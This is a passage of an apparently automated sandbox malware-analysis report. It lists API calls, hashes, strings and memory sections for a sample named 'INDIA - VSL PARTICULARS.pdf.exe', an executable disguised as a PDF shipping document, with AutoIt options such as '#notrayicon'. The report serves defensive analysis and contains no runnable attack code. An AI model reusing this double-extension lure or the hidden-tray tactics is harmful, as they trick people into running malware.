                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                              Similarity
                              • API ID:
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 0-1603158881
                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                              • DestroyWindow.USER32(?), ref: 00426F50
                              • UnregisterHotKey.USER32(?), ref: 00426F77
                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                              • String ID: close all$#v
                              • API String ID: 4174999648-3101823635
                              • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                              • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                              APIs
                              • CreateMenu.USER32 ref: 00448603
                              • SetMenu.USER32(?,00000000), ref: 00448613
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                              • IsMenu.USER32(?), ref: 004486AB
                              • CreatePopupMenu.USER32 ref: 004486B5
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                              • DrawMenuBar.USER32 ref: 004486F5
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                              • String ID: 0
                              • API String ID: 161812096-4108050209
                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe), ref: 00434057
                              • LoadStringW.USER32(00000000), ref: 00434060
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                              • LoadStringW.USER32(00000000), ref: 00434078
                              • _wprintf.LIBCMT ref: 004340A1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                              • C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, xrefs: 00434040
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3648134473-1222234808
                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                              • Opcode Fuzzy Hash: b5b2eb1c0fd75675c26b78e4e5fa3366e30ffffa818d49f3caf60ca944b06ede
                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                              Similarity
                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                              • String ID:
                              • API String ID: 978794511-0
                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                              Similarity
                              • API ID: _memmove$_memcmp
                              • String ID: '$\$h
                              • API String ID: 2205784470-1303700344
                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                              APIs
                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                              • VariantClear.OLEAUT32 ref: 0045EA6D
                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                              • __swprintf.LIBCMT ref: 0045EC33
                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                              Strings
                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                              Similarity
                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                              • String ID: %4d%02d%02d%02d%02d%02d
                              • API String ID: 2441338619-1568723262
                              • Opcode ID: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                              • Opcode Fuzzy Hash: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID: @COM_EVENTOBJ
                              • API String ID: 327565842-2228938565
                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                              APIs
                              • VariantClear.OLEAUT32(?), ref: 0047031B
                              • VariantClear.OLEAUT32(?), ref: 0047044F
                              • VariantInit.OLEAUT32(?), ref: 004704A3
                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                              • VariantClear.OLEAUT32(?), ref: 00470516
                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                              • String ID: H
                              • API String ID: 3613100350-2852464175
                              • Opcode ID: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                              • Opcode Fuzzy Hash: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                              • String ID:
                              • API String ID: 1291720006-3916222277
                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                              • IsMenu.USER32(?), ref: 0045FC5F
                              • CreatePopupMenu.USER32 ref: 0045FC97
                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                              • String ID: 0$2
                              • API String ID: 93392585-3793063076
                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                              APIs
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                              • VariantClear.OLEAUT32(?), ref: 00435320
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                              • VariantClear.OLEAUT32(?), ref: 004353B3
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                              • String ID: crts
                              • API String ID: 586820018-3724388283
                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                              • _wcscat.LIBCMT ref: 0044BCAF
                              • _wcslen.LIBCMT ref: 0044BCBB
                              • _wcslen.LIBCMT ref: 0044BCD1
                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                              • String ID: \*.*
                              • API String ID: 2326526234-1173974218
                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                              APIs
                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                              • _wcslen.LIBCMT ref: 004335F2
                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                              • GetLastError.KERNEL32 ref: 0043362B
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                              • _wcsrchr.LIBCMT ref: 00433666
                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                              • String ID: \
                              • API String ID: 321622961-2967466578
                              • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                              • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                              • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                              • __lock.LIBCMT ref: 00417981
                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                              • __lock.LIBCMT ref: 004179A2
                              • ___addlocaleref.LIBCMT ref: 004179C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$pI
                              • API String ID: 637971194-197072765
                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$_malloc
                              • String ID:
                              • API String ID: 1938898002-0
                              • Opcode ID: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                              • Opcode Fuzzy Hash: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                              • _memmove.LIBCMT ref: 0044B555
                              • _memmove.LIBCMT ref: 0044B578
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
